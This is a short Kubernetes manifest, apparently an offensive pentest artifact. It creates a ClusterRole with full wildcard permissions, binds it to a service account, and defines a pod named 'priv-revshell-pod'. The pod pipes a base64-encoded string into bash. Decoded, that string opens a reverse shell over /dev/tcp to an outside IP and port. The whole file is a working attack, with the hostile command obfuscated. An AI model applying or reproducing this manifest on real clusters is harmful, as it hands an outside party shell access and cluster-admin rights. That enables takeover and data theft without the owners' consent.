apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: chill-guy
rules:
- apiGroups:
  - '*'
  resources:
  - '*'
  verbs:
  - '*'
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: chill-guy
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: chill-guy
subjects:
- kind: ServiceAccount
  namespace: default
  name: chill-guy
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: chill-guy
---
apiVersion: v1
kind: Pod
metadata:
  name: priv-revshell-pod
  labels:
    app: pentest
spec:
  containers:
  - name: priv-pod
    image: r0binak/mtkpi:v1.5
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "echo MDwmMTk2O2V4ZWMgMTk2PD4vZGV2L3RjcC8xNzIuMjkuNC4xMzgvMjI4Mzsgc2ggPCYxOTYgPiYxOTYgMj4mMTk2 | base64 -d | /bin/bash" ]
